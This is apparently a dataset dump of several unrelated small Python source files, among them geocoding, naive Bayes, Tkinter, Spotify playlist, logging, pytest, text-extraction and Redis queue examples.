+{"seq_id":"378013012","text":"from geopy.geocoders import Nominatim\n\n\ndef parse_location_from_address():\n geo_locator = Nominatim(user_agent=\"specify_your_app_name_here\")\n location = geo_locator.geocode(\"175 5th Avenue NYC\")\n # print(location.address)\n # print((location.latitude, location.longitude))\n print(location.raw)\n\n\ndef get_address_from_latlng():\n geo_locator = Nominatim(user_agent=\"specify_your_app_name_here\")\n location = geo_locator.reverse(\"23.8185045,90.3555421\", language=\"en\")\n print(location.raw)\n for k, v in location.raw.items():\n print(f\"{k}: {v} \")\n\n print(location.address)\n\n\nget_address_from_latlng()\n","sub_path":"geo_coder.py","file_name":"geo_coder.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"591686092","text":"# -*- co ding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 31 16:32:51 2014\n\n@author: Kshitij\n\"\"\"\nimport numpy as np\nimport math\nF_sl = []\nF_sw = []\nF_pl = []\nF_pw = []\n\nft = {\"sl\":0, \"sw\":1, \"pl\":2, \"pw\":3}\n\nbin_info = {0:[3.6/4, 4, 4.3], 1:[2.4/4, 4, 2.0], 2:[5.9/5, 5, 1], 3:[2.4/3, 3, 0.1]}\npercentage = 40\ntraining = {}\ntest = {}\nprior = {0:0, 1:0, 2:0}\n\ndef main():\n\n #variables \n global F_pl\n global F_sl\n global F_pw\n global F_sw\n data = []\n misclass = 0\n #read data from file\n f = open(\"iris.txt\")\n for line in f:\n y = line.split()\n \n data.append(y)\n \n #randomly select data for training and testing\n pickData(data, percentage)\n \n #calculates P(C_1), P(C_2), P(C_3) from the training data\n calcPrior(percentage/100*len(data))\n #print(prior)\n \n #Initialize Feature Histograms (F1, F2, F3, F4) with given # of bins \n F_pl = initFMat(F_pl, bin_info[ft[\"pl\"]][1])\n F_pw = initFMat(F_pw, bin_info[ft[\"pw\"]][1]) \n F_sl = initFMat(F_sl, bin_info[ft[\"sl\"]][1])\n F_sw = initFMat(F_sw, bin_info[ft[\"sw\"]][1])\n \n #Fill up the historgrams\n F_pl = fillBin(F_pl, training, ft[\"pl\"], bin_info[ft[\"pl\"]][0], bin_info[ft[\"pl\"]][1])\n print(\"Hist for Petal_length: \",F_pl)\n F_pw = fillBin(F_pw, training, ft[\"pw\"], bin_info[ft[\"pw\"]][0], bin_info[ft[\"pw\"]][1])\n print(\"Hist for Petal_width: \",F_pw)\n F_sl = fillBin(F_sl, training, ft[\"sl\"], bin_info[ft[\"sl\"]][0], bin_info[ft[\"sl\"]][1])\n print(\"Hist for sepal_length: \",F_sl)\n F_sw = fillBin(F_sw, training, ft[\"sw\"], bin_info[ft[\"sw\"]][0], bin_info[ft[\"sw\"]][1]) \n print(\"Hist for sepal_width: \",F_sw)\n\n #testing bayes\n for key, value in test.items():\n print(\"key \",key)\n \n if naiveBayes(value):\n print(\"correctly classified!\")\n else:\n misclass+=1\n \n print(\"misclass: \", 100*misclass/len(test))\n\ndef initFMat(F, div):\n F = [[0 for i in range(div)] for j in range(3)]\n return F\n\n\ndef naiveBayes(test_tuple):\n #print(\"test_tuple val for sw: \", test_tuple[ft[\"sw\"]])\n # class 1\n # Feature 1\n swbin = int((float(test_tuple[ft[\"sw\"]])-bin_info[ft[\"sw\"]][2]-0.001)/bin_info[ft[\"sw\"]][0])\n #print(\"this tuple sits here for feature sw: \", swbin) \n slbin = int((float(test_tuple[ft[\"sl\"]])-bin_info[ft[\"sl\"]][2]-0.001)/bin_info[ft[\"sl\"]][0])\n #print(\"this tuple sits here for feature sl: \", slbin)\n #print(\"min pl\",bin_info[ft[\"pl\"]][2])\n #print(\"bin width\", bin_info[ft[\"pl\"]][0])\n plbin = int((float(test_tuple[ft[\"pl\"]])-bin_info[ft[\"pl\"]][2]-0.001)/bin_info[ft[\"pl\"]][0])\n #print(\"this tuple sits here for feature pl: \", plbin)\n pwbin = int((float(test_tuple[ft[\"pw\"]])-bin_info[ft[\"pw\"]][2]-0.001)/bin_info[ft[\"pw\"]][0])\n #print(\"this tuple sits here for feature pw: \", pwbin)\n \n p_cl0 = prior[0]*F_sw[0][swbin]*F_sl[0][slbin]*F_pl[0][plbin]*F_pw[0][pwbin]\n #print(\"F_sw: \", F_sw)\n #print(\"F_pl: \", F_pl)\n #print(\"F_pw: \", F_pw)\n #print(\"F_sl: \", F_sl)\n print(\"probability of being in class 0: \", p_cl0)\n \n p_cl1 = prior[1]*F_sw[1][swbin]*F_sl[1][slbin]*F_pl[1][plbin]*F_pw[1][pwbin]\n print(\"probability of being in class 1: \", p_cl1) \n \n p_cl2 = prior[2]*F_sw[2][swbin]*F_sl[1][slbin]*F_pl[2][plbin]*F_pw[2][pwbin]\n print(\"probability of being in class 2: \", p_cl2)\n\n cls = [p_cl0, p_cl1, p_cl2].index(max([p_cl0, p_cl1, p_cl2]))\n print(\"predicted class: \", cls)\n\n print(\"actual class: \", test_tuple[4]) \n \n if cls == int(test_tuple[4]):\n return True\n else:\n 
return False\n\ndef fillBin(F, data, fid, size, div):\n feature_data = []\n for key, value in data.items():\n feature_data.append([value[fid], value[4]])\n feature_data.sort() \n \n #print(\"F NEW!!:\",F)\n binC = [] \n for i in range(div):\n #binC.append((i+1)*size+bin_info[fid][2]*10)\n temp = (i+1)*size+bin_info[fid][2]\n ntemp = math.ceil(temp*10)/10\n binC.append(ntemp)\n \n print(\"binC:\",binC)\n binIn = 0 \n \n for x in feature_data:\n if (float(x[0])>binC[binIn]):\n binIn+=1\n #print(\"x[0]:\", x[0])\n #print(\"x[1]: \", x[1])\n #print(\"binIn: \", binIn)\n F[int(x[1])][binIn]+=1\n \n tot = [0 for j in range(3)]\n \n for j in range(3):\n for i in range(div):\n tot[j]+=F[j][i]\n\n #print(\"tot: \",tot) \n #print(\"F: \",F)\n for j in range(3):\n for i in range(div):\n if tot[j]==0:\n tot[j]=1\n F[j][i] = F[j][i]/tot[j]\n \n return F\n \ndef calcPrior(total):\n for i in training:\n #print(training[i][4])\n if training[i][4] == '0':\n prior[0]+=1\n elif training[i][4] == '1':\n prior[1]+=1\n else:\n prior[2]+=1\n for i in prior:\n prior[i]=prior[i]/total\n\ndef pickData(data, perc):\n \n global training \n global test\n x=0\n #print(\"sizes:\", round(perc/100*len(data)))\n while x < (round(perc/100*len(data))):\n x+=1\n temp = np.random.random_integers(0, len(data)-1)\n if temp not in training:\n training[temp] = data[temp]\n else:\n x-=1\n \n #print(len(training))\n for y in range(len(data)):\n if y not in training:\n test[y] = data[y]\n \n\nif __name__ == \"__main__\":\n main() ","sub_path":"randomDataPicker.py","file_name":"randomDataPicker.py","file_ext":"py","file_size_in_byte":5437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"121362815","text":"#!/usr/bin/env python2\n# -*- coding: utf8\n\n\"\"\"\tdemo for MVC with ttk.TreeView and ttk styling.\n\"\"\"\n\nfrom __future__ import print_function\nfrom pprint import pprint\n\ntry:\n import tkinter as tk\nexcept Exception as ex:\n import Tkinter as tk\n\nimport ttk\n\nfrom node import node\n \nclass tree_model(object):\n \"\"\"\n \"\"\"\n \n def __init__(self, config_file=None):\n \"\"\"\n \"\"\" \n self.root = None\n if config_file is not None:\n self.load_config(config_file)\n \n def load_config(self, config_file):\n \"\"\"\n \"\"\"\n self.root = node.tree_from_nested_list(node.sample_tree)\n \n#s = ttk.Style()\n#s.configure('My.TFrame', background='red')\n \nclass tree_view(ttk.Frame):\n \"\"\"\n \"\"\"\n\n @staticmethod\n def object_to_id(object):\n return str(object).replace(' ','_')\n \n def __init__(self, master, presenter):\n \"\"\"\n \"\"\"\n ttk.Frame.__init__(self, master) #, style='My.TFrame')\n\n self.popup = None\n \n self.sb = ttk.Scrollbar(self)\n self.sb.pack(side=tk.RIGHT, expand=tk.NO, fill=tk.Y)\n self.tv = ttk.Treeview(self, columns=('v1','v2','v3'),\n displaycolumns=('#all'),\n selectmode='browse',\n show='tree headings',\n yscrollcommand=self.sb.set\n )\n self.tv.pack(side=tk.LEFT, expand=tk.YES, fill=tk.BOTH)\n self.tv.heading('#0',text='Element')\n self.sb.configure(command=self.tv.yview)\n \n self.presenter = presenter\n \n self.tv.bind('<>', self.selection)\n self.tv.bind('', self.context_menu)\n\n def selection(self, event):\n self.presenter.selection(self.rmap[self.tv.selection()[0]])\n\n def update_view(self, data_list):\n \"\"\"\n \"\"\"\n self.map = {None:''} # object -> menu_id\n if data_list is not None:\n for d in data_list:\n try:\n pid = self.map[d.parent]\n new_id = self.tv.insert(pid, index='end', text=unicode(d.value), value=(unicode(d.value), unicode(d.value), 'a titi'), open=True)\n self.map[d] = new_id \n except Exception as ex:\n print('-- Exception while inserting entry :',ex)\n print('map is', self.map)\n print('pid is', pid)\n self.rmap = {}\n for x in self.map.keys():\n self.rmap[self.map[x]] = x # menu_id -> object, useful when selecting\n\n def context_menu(self, event):\n item_id = self.tv.identify('item',event.x,event.y)\n if item_id=='':\n return\n #print('treeview item', item_id)\n self.tv.selection_set(item_id)\n obj = self.rmap[item_id]\n # create a popup menu from a menu structure\n menu_title, menu_description = obj.menu_structure()\n self.popup = self.build_popup(menu_description, menu_title=menu_title)\n self.popup.tk_popup(event.x_root, event.y_root)\n \n def build_popup(self, menu_description, menu_title=None, parent=None):\n if parent is None:\n parent = self\n menu = tk.Menu(parent, tearoff=0, title=menu_title) # tearoff=1 implies handling menu changes on other tree nodes changes\n if menu_title is not None:\n menu.add_command(label=' '+menu_title, bitmap='gray75', compound='left', command=None, background='black', foreground='white')\n for entry in menu_description:\n title, action = entry\n if isinstance(action, list):\n submenu = self.build_popup(action, parent=menu)\n menu.add_cascade(label=title, menu=submenu)\n elif title is None:\n menu.add_separator()\n elif action is None: # to be removed, was title\n #menu.add_command(label=' '+title, bitmap='gray25', compound='left', state='disabled', background='black', foreground='white')\n menu.add_command(label=' '+title, background='black', foreground='white')\n else:\n menu.add_command(label=title, command=action)\n \n return menu\n \n \n 
def insert_item(self, item):\n \"\"\" \n * The following item options may be specified for items in the insert and item widget commands:\n text The textual label to display for the item.\n image A Tk Image, displayed to the left of the label.\n values The list of values associated with the item.\n Each item should have the same number of values as the widget option columns. \n If there are fewer values than columns, the remaining values are assumed empty. If there are more values than columns, the extra values are ignored.\n open True/False value indicating whether the item’s children should be displayed or hidden.\n tags A list of tags associated with this item.\n \n * The following options may be specified on tags:\n foreground Specifies the text foreground color.\n background Specifies the cell or item background color.\n font Specifies the font to use when drawing text.\n image Specifies the item image, in case the item’s image option is empty.\n\n The Treeview widget generates the following virtual events:\n <> Generated whenever the selection changes.\n <> Generated just before settings the focus item to open=True.\n <> Generated just after setting the focus item to open=False.\n \n parent is the item ID of the parent item, or the empty string to create a new top-level item. \n index is an integer, or the value “end”, \n specifying where in the list of parent’s children to insert the new item. \n If index is less than or equal to zero, the new node is inserted at the beginning; \n if index is greater than or equal to the current number of children, it is inserted at the end. \n If iid is specified, it is used as the item identifier; iid must not already exist in the tree. Otherwise, a new unique identifier is generated.\n \"\"\"\n\nclass tree_presenter(object):\n \"\"\"\n \"\"\"\n \n def __init__(self, model, on_select):\n \"\"\"\n \"\"\"\n self.model = model\n print('model=', model)\n self.views = []\n self.on_select = on_select\n \n def new_ui_view(self, master):\n \"\"\"\n \"\"\"\n new_view = tree_view(master, self)\n self.views.append(new_view)\n new_view.update_view(self.model.root.all_subtree_nodes())\n return new_view\n \n def update_view(self):\n \"\"\"\n \"\"\"\n for v in self.views:\n v.update_view(self.model.root.all_subtree_nodes())\n \n def selection(self, object):\n \"\"\"\n \"\"\"\n #print(event, event.widget)\n #w = event.widget\n #print(w.focus(), w.selection())\n print('selected object', object)\n\n #def right_click(self, event):\n # w = event.widget\n\n def context_menu(self, event):\n print('right click')\n w = event.widget\n print(w.focus(), w.selection())\n\n\nclass app_window(tk.Frame):\n\n EXIT_OK = 0\n EXIT_FAIL_INIT = 1\n EXIT_UNEXPECTED = 2\n\n def __init__(self, master, model):\n \"\"\"\n \"\"\"\n self.exit_status = 2 # not initialized yet\n \n tk.Frame.__init__(self, master)\n\n self.tp = tree_presenter(model, self.selection)\n \n self.t = self.tp.new_ui_view(self)\n self.t.pack(expand=tk.YES, fill=tk.BOTH)\n \n tk.Button(self, text='Quit', command=self.event_quit_request).pack()\n \n def event_quit_request(self, optional_code=None):\n \"\"\"\n \"\"\" \n print(optional_code)\n self.exit_status = app_window.EXIT_OK\n self.master.destroy()\n\n def selection(self, event):\n \"\"\"\n \"\"\"\n print(event)\n print(self.t.focus(), self.t.selection())\n\n\n#\n#\n#\n \nif __name__ == '__main__':\n\n try:\n root = tk.Tk()\n except Exception as ex:\n print(ex)\n exit(app_window.EXIT_FAIL_INIT)\n try:\n data = tree_model('dummy')\n print('data=', data)\n aw = 
app_window(root, data)\n except Exception as ex:\n print(ex)\n exit(app_window.EXIT_FAIL_INIT)\n else:\n aw.pack(expand=tk.YES, fill=tk.BOTH)\n root.protocol('WM_DELETE_WINDOW', aw.event_quit_request)\n try:\n root.mainloop()\n except Exception as ex:\n print(ex)\n print(aw.exit_status)\n exit(aw.exit_status)\n ","sub_path":"t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":8083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"237768678","text":"from os import path\nimport sys\nimport json\n\n# Add the parent directory to the sys.path so allow importing modules\n# in the ../lib directory\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\nfrom lib.spotify import Spotify\nfrom lib.database import Database\n\ndef main():\n spotify = Spotify(user_id = 'therumbler')\n playlist_all_id = '7kyx2nzrGrCmjfdcMA5h4S'\n playlist_all = spotify.get_all('users/therumbler/playlists/{}/tracks'.format(playlist_all_id))\n\n playlist_instrumental_id = '65BFOkaLoWIRF2jePfOSl8'\n playlist_instrumental = spotify.get_all('users/therumbler/playlists/{}/tracks'.format(playlist_instrumental_id))\n playlist_vocals_id = '4uWb4JEKt4Z1cclJF7tktk'\n playlist_vocals = spotify.get_all('users/therumbler/playlists/{}/tracks'.format(playlist_vocals_id))\n track = spotify.get('audio-features/3OhepZ0HXPdhxVw5XbejdV')\n\n print(json.dumps(playlist_all['total'], indent =2))\n for item in playlist_all['items']:\n track = item['track']\n #print json.dumps(track, indent = 2)\n audio_features = spotify.get('audio-features/{}'.format(track['id']))\n\n playlist_id = None\n if audio_features['instrumentalness'] > 0.75:\n # add to intrumental playlist\n if track['id'] not in [item['track']['id'] for item in playlist_instrumental['items']]:\n playlist_id = playlist_instrumental_id\n if audio_features['instrumentalness'] < 0.25:\n\n # add to vocal playlist\n if track['id'] not in [item['track']['id'] for item in playlist_vocals['items']]:\n playlist_id = playlist_vocals_id\n\n if playlist_id:\n\n print(\"about to add track {} to playlist {}\".format(track['id'], playlist_id))\n #spotify.post('users/therumbler/playlists/{}/tracks/?uris={}'.format(playlist_id, track['uri']))\n else:\n print(\"track {} has an instrumentalness of {}\".format(track['id'], audio_features['instrumentalness']))\n \nif __name__ == \"__main__\":\n main()\n\n","sub_path":"scripts/playlist_update.py","file_name":"playlist_update.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"20496372","text":"import logging\nimport logging.handlers\n\ndef loggingBasic():\n checkVal = input(\"input True or False:\")\n logging.basicConfig(filename='./log/test.log', level=logging.DEBUG)\n logging.info(\"==============================\")\n logging.debug(\"Debug\")\n logging.info(\"Announced Time\")\n logging.warning(\"Warning\")\n logging.error(\"Error\")\n logging.critical(\"Critical Error\")\n\n logging.info(\"==============================\")\n print(\"Retrieve\")\n\n if checkVal:\n print(\"checkVal:%s\"%checkVal)\n else:\n print(\"checkVal:%s\"%checkVal)\n logging.critical(\"Critical Error\")\n\n\ndef loggerBasic():\n print(\"loggerBasic()\")\n\n logger = logging.getLogger('mylogger')\n\n fileHandler = logging.FileHandler('./log/testLog.log')\n streamHandler = logging.StreamHandler()\n\n logger.addHandler(fileHandler)\n logger.addHandler(streamHandler)\n\n logger.setLevel(logging.DEBUG)\n logger.debug(\"===========================\")\n logger.info(\"TEST START\")\n logger.warning(\"스트림으로 로그가 남아요~\")\n logger.error(\"파일로도 남으니 안심이죠~!\")\n logger.critical(\"치명적인 버그는 꼭 파일로 남기기도 하고 메일로 발송하세요!\")\n logger.debug(\"===========================\")\n logger.info(\"TEST END!\")\n\ndef loggerIntermediate():\n print(\"\\n\\033[96mloggerIntermediate\\033[0m\")\n\n logger = logging.getLogger('mylogger')\n\n formatter = logging.Formatter('[%(levelname)s|%(filename)s] %(asctime)s > %(message)s')\n\n fileHandler = logging.FileHandler('./log/testLog.log')\n streamHandler = logging.StreamHandler()\n\n fileHandler.setFormatter(formatter)\n streamHandler.setFormatter(formatter)\n\n logger.addHandler(fileHandler)\n logger.addHandler(streamHandler)\n\n logger.setLevel(logging.DEBUG)\n logger.debug(\"\\033[96m===========================\")\n logger.info(\"TEST START\")\n logger.warning(\"스트림으로 로그가 남아요~\")\n logger.error(\"파일로도 남으니 안심이죠~!\")\n logger.critical(\"치명적인 버그는 꼭 파일로 남기기도 하고 메일로 발송하세요!\")\n logger.debug(\"\\033[96m===========================\\033[0m\")\n logger.info(\"TEST END!\")\n\n# loggerBasic()\nloggerIntermediate()","sub_path":"EXCode/loggingTest.py","file_name":"loggingTest.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"535232321","text":"import pytest\r\nimport os\r\nimport sys\r\n\r\nsys.path.append('E:/gitL/PycharmProjects/Reptile/autoTestDemo_pytest')\r\n\r\nfrom SourceCode.calc import Calculator\r\n\r\nimport allure\r\n\r\n'''\r\n-pytest命名规则\r\n .文件名要以test_开头\r\n .类名要以Test开头,首字母大写,方法名要以test_开头\r\n\r\n-Allure\r\n .Allure.attch()\r\n .Allure.attch.file()\r\n\r\n-Fixture固件,自定义用例预置条件,功能类似于setup、teardown,不过更为灵活\r\n .把固件名称当参数传入用例函数调用\r\n .默认级别是scope=function,每个函数可调用\r\n .scope=class,每个类可调用一次,scope=module,每个.py文件可调用一次,scope=session,多个.py文件调用一次\r\n .pytest会自动识别该文件,放在与用例同一package下,不需要导入\r\n'''\r\ntest_user_data2 = ['admin1', 'admin2']\r\n\r\n\r\n@pytest.fixture(scope=\"class\")\r\ndef fix():\r\n print('first run fixture')\r\n\r\n\r\n@pytest.fixture(scope=\"module\")\r\ndef par(request):\r\n param = request.param\r\n print('测试request获取作用在用例上的数据: %s' % param)\r\n yield param\r\n\r\n\r\nclass TestCalc:\r\n\r\n @classmethod\r\n def setup_class(cls):\r\n print(os.path.abspath('.'))\r\n print(os.path.abspath(__file__))\r\n print(sys.path)\r\n print('所有测试用例运行前执行')\r\n # assert os.path.abspath('.') in sys.path\r\n cls.calc = Calculator()\r\n\r\n def test_add(self, login):\r\n print('run add')\r\n assert 2 == self.calc.add(1, 1)\r\n\r\n def test_div(self, fix):\r\n print('run div')\r\n assert 3 == self.calc.div(9, 3)\r\n\r\n @pytest.mark.parametrize('a,b,c', [\r\n (1, 2, 3),\r\n (-1, -2, -3),\r\n (0.2, 0.2, 0.4),\r\n (1000, 2000, 3000),\r\n (0, 0, 0)\r\n ])\r\n def test_param(self, a, b, c):\r\n print(c)\r\n assert c == a + b\r\n\r\n def teardown(self):\r\n print('每个用例运行后执行')\r\n\r\n @classmethod\r\n def teardown_class(cls):\r\n print('所有测试用例运行完后执行')\r\n\r\n\r\nclass TestCalc1:\r\n @classmethod\r\n def setup_class(cls):\r\n print('所有测试用例运行前执行')\r\n cls.calc1 = Calculator()\r\n\r\n def test_add(self):\r\n print('run add2')\r\n assert 2 == self.calc1.add(1, 1)\r\n\r\n def test_div(self, fix):\r\n print('run div2')\r\n assert 3 == self.calc1.div(9, 3)\r\n\r\n @pytest.mark.parametrize('par', test_user_data2, indirect=True)\r\n def test_par(self, par):\r\n # 添加indirect=True参数是为了把par当成一个函数去执行,而不是一个参数\r\n # par函数获取test_user_data2数据\r\n param = par\r\n print(param)\r\n assert 'admin' in param\r\n","sub_path":"PycharmProjects/Reptile/autoTestDemo_pytest/Testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":2721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"344484064","text":"from server import run_server\nfrom config import Config\nimport logging.config\n\nif __name__ == '__main__':\n logging.config.fileConfig('logging.conf')\n try:\n config = Config('server.conf')\n run_server(config)\n except Exception as e:\n logging.critical('Invalid configuration: \"{}\"'.format(e))\n exit(1)\n","sub_path":"server-for-calendar/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"558893014","text":"import re\n\nweb = [\"www.\", \"://\", \".com\", \".net\", \".org\", \".us\", \".gov\"]\naccepted_tags = [\"p\", \"span\", \"article\", \"font\", \"blockquote\"]\nexclude = [\"cite\"]\naccepted_classes = {\"paragraph\", \"text\"}\nbad_phrases = [\"back to top\", \"home\", \"welcome\", \"you are here:\", \"itunes\", \"google\", \"facebook\", \"twitter\", \"comment\"]\nbad_subphrases = [\"powered by\", \"around the web\", \"around the internet\", \"et al\", \"ndl\", \"view source\", \"view history\",\n \"edit links\", \"last modified\", \"text is available under\", \"creative commons\"]\nbad_headers = [\"References\", \"Citations\", \"Further Reading\", \"External Links\", \"Footnotes\", \"See Also\"]\na = lambda x: x == x.lower()\n\nA = re.compile(\"[a-zA-Z]{2,}[0-9]{2,}[ \\\\.]*\")\nB = re.compile(\"([0-9]+[a-zA-Z]+)+[\\\\s\\\\.]+\")\nC = re.compile(\"[\\\\[\\\\{].*[\\\\]\\\\}]\")\nD = re.compile(\"[A-Z]{2,3}: {0,2}[0-9]{3,}.{0,2}[0-9]*\")\nE = re.compile(\"\\\\([a-zA-Z\\\\s]+ ([0-9]+[.]*)+\\\\)\")\nF = re.compile(\"(\\\\\\\\[a-zA-Z0-9]{1,5})\")\ndef add_item(goods, parent):\n goods.append(parent)\n\n\ndef find_good(parent, goods, wiki_mode):\n if parent is not None:\n if not parent.__class__.__name__ == \"NavigableString\" and not parent.__class__.__name__ == \"Comment\":\n if hasattr(parent, \"name\"):\n if parent.name in accepted_tags:\n add_item(goods, parent)\n else:\n classes_proto = parent.get(\"class\")\n classes = set() if classes_proto is None else set(filter(a, classes_proto))\n ids_proto = parent.get(\"id\")\n # ids = set() if ids_proto is None else set(filter(a, ids_proto))\n # converts all lists of ids and classes to sets with their lowercase versions\n # ids are not currently used, but may be used later\n if bool(classes & accepted_classes):\n add_item(goods, parent)\n # if the class is an accepted class, add the item to the list\n else:\n if hasattr(parent, \"children\"):\n for item in parent.children:\n if hasattr(item, \"get_text\"):\n if not(item.name==\"a\" or item.parent.name==\"a\"):\n t = item.get_text().strip()\n if t in bad_headers:\n add_item(goods, None)\n return False\n find_good(item, goods, wiki_mode)\n # searches through the child's child nodes\n elif parent.__class__.__name__ == \"NavigableString\":\n add_item(goods, parent)\n\n\ndef decide(factors, threshold):\n totalWeight = 0\n totalValue = 0\n for value, weight in factors:\n totalValue += value * weight\n totalWeight += weight\n adjusted = totalValue / totalWeight\n return adjusted > threshold\n\n\ndef check(text):\n texts = text.split(\"\\n\")\n result = \"\"\n for item in texts:\n new = (checkIndividual(item) + \"\\n\")\n result += new\n return result\n\n\ndef checkIndividual(text):\n if \"°\" in text and len(text) < 100:\n return \"\"\n text = destroy_citations(text.replace(\"\\r\", \"\\n\"))\n stripped = text.lower().strip(\"\\n\").strip(\"\\t\").strip(\" \").strip(\"\\r\")\n if stripped in bad_phrases:\n return \"\"\n for item in bad_subphrases:\n if item in stripped:\n return \"\"\n for item in web:\n if item in text:\n text = text.replace(item, \"\")\n if len(stripped) < 7:\n return \"\"\n if not text[0].isalnum() and not text[0] == \" \" and not text[0] == \"/t\" and not text[0] == \"\\n\":\n return \"\"\n lastchr = stripped[len(stripped) - 1]\n if not lastchr.isalnum() and not (lastchr == \".\" or lastchr == \"?\" or lastchr == \" \"):\n return \"\"\n if stripped.isdigit():\n return \"\"\n endsWithPunc = 0 if stripped[len(stripped) - 1] == '.' 
else 1\n length = 1 / (len(stripped) - 6)\n numSpaces = 1 / (stripped.count(' ') + 1)\n if numSpaces > 1 / 3:\n return \"\"\n factors = [(endsWithPunc, 2), (length, 1), (numSpaces, 3)]\n if decide(factors, 0.4):\n return \"\"\n return text\n\n\ndef extract(item):\n result = \"\"\n if hasattr(item, \"children\"):\n for text in item.children:\n if not hasattr(text, \"name\") or not text.name in exclude:\n result += extract(text)\n elif hasattr(item, \"get_text\"):\n result = item.get_text()\n else:\n result = item\n return result.replace(\"\\n\", \" \")\n\n\ndef check_spaces(text):\n obj = re.compile(\"[\\\\s \\\\t\\\\n]{2,}]\")\n text = obj.sub(\" \", text)\n text = re.compile(\"[ ]{2,}\").sub(\" \", text)\n text = text.replace(\"\\n \", \"\\n\").replace(\" \\n\", \"\\n\")\n text = re.compile(\"[\\\\r\\\\n]{3,}\").sub(\"\\n\", text)\n return text\n\n\ndef destroy_citations(text):\n return A.sub(\" \", B.sub(\" \", C.sub(\"\", D.sub(\" \", E.sub(\" \", F.sub(\" \", text))))))\n\n\ndef get_text(soup):\n soup = soup.html\n wiki_mode = False\n if (\"wikipedia.org\" in str(soup)):\n wiki_mode = True\n goods = list()\n find_good(soup, goods, wiki_mode)\n text = \"\"\n for item in goods:\n if item is None:\n break\n extraction = extract(item)\n if extraction is not None:\n text += extraction + \"\\n\"\n text = check_spaces(text)\n text = check(text)\n text = check_spaces(text)\n #return text.split(BAD_STUFF)[0]\n return text\n","sub_path":"text_extraction.py","file_name":"text_extraction.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"640095873","text":"# -*- coding:utf-8 -*-\n# @Time: 2019-09-16 20:20\n# @Author: duiya duiyady@163.com\n\n\ndef isPalindrome(x):\n if x < 0:\n return False\n x = str(x)\n i, j = 0, len(x)-1\n while i < j:\n if x[i] == x[j]:\n i = i + 1\n j = j - 1\n else:\n break\n if i < j:\n return False\n else:\n return True\n\n\nif __name__ == '__main__':\n print(isPalindrome(123))","sub_path":"src/main/num001_100/9_回文数.py","file_name":"9_回文数.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"182512816","text":"from setuptools import setup\n\nmeta = dict(\n name=\"envcrypt\",\n version=\"0.0.1\",\n py_modules=[\"envcrypt\"],\n author='Will Maier',\n author_email='will@simple.com',\n test_suite='tests',\n scripts=['scripts/envcrypt'],\n install_requires=[\n \"docopt\"\n ],\n)\n\nsetup(**meta)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"66608472","text":"from RedisQueue.redis_queue import RedisQueue\nimport configparser\nimport LogUtil\nfrom concurrent.futures import ProcessPoolExecutor\n\ndef InforLoadConfigUtil(config_file_name, segment_name):\n tmplist = []\n try:\n cf = configparser.ConfigParser()\n cf.read(config_file_name, encoding='utf-8')\n for item in cf.items(segment_name):\n tmplist.append(item[1])\n return tmplist\n except Exception as e:\n return None\n\n\ndef InitQueueConf(config_file_name, segment_name):\n redisConfig = InforLoadConfigUtil(config_file_name, segment_name)\n host, port, db = redisConfig\n return dict(host = host, port = int(port), db = int(db))\n\n\n\nif __name__=='__main__':\n \n config_file_name = \"config_startup.ini\"\n segment_name = \"redis\"\n redisConf = InitQueueConf(config_file_name, segment_name)\n request_segment_name = 'queue_request'\n request_segment_domain = InforLoadConfigUtil(config_file_name, request_segment_name)[0]\n q = RedisQueue('rq', **redisConf)\n # 处理队列\n q_handler = RedisQueue('handled', **redisConf)\n # 成功队列\n q_succeed = RedisQueue('succeed', **redisConf)\n # 错误队列1\n q_error1 = RedisQueue('error1', **redisConf)\n # 处理过程中错误队列1\n q_error1_handle = RedisQueue('error1:handle', **redisConf)\n # 成功时的错误队列1\n q_error1_succeed = RedisQueue('error1:succeed', **redisConf)\n # 错误队列2\n q_error2 = RedisQueue('error2', **redisConf)\n \n print('test')\n","sub_path":"Demo/RedisDemo.py","file_name":"RedisDemo.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"247724314","text":"import collections\nclass Solution:\n def alienOrder(self, words: List[str]) -> str:\n # case: ['z', 'z']\n edges = collections.defaultdict(list)\n inDegree = collections.defaultdict(int)\n zeroDegree = []\n # set('yuan') -> {'y', 'u', 'a', 'n'}\n all_letters = set(''.join(words))\n for i in range(1, len(words)):\n word1, word2 = words[i-1], words[i]\n len1, len2 = len(word1), len(word2)\n # find the first different letter. Don't forget to break!\n for j in range(min(len1, len2)):\n if word1[j] != word2[j]:\n inDegree[word2[j]] += 1\n edges[word1[j]].append(word2[j])\n break\n res = ''\n # find the zero degrees\n for letter in all_letters:\n if inDegree[letter] == 0:\n zeroDegree.append(letter)\n while zeroDegree:\n cur = zeroDegree.pop()\n res += cur\n for neighbor in edges[cur]:\n inDegree[neighbor] -= 1\n if inDegree[neighbor] == 0:\n zeroDegree.append(neighbor)\n return '' if len(res) != len(all_letters) else 